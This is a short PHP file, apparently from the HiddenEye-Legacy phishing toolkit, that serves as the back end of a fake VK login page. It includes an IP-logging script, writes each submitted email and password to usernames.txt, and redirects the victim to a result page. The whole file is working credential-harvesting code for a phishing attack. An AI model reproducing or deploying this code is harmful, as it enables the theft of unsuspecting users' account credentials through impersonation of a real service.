HiddenEye-Legacy/WebPages/VK_poll_method/login.php

7 lines
186 B
PHP
Raw Normal View History

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: ./result.html');
exit();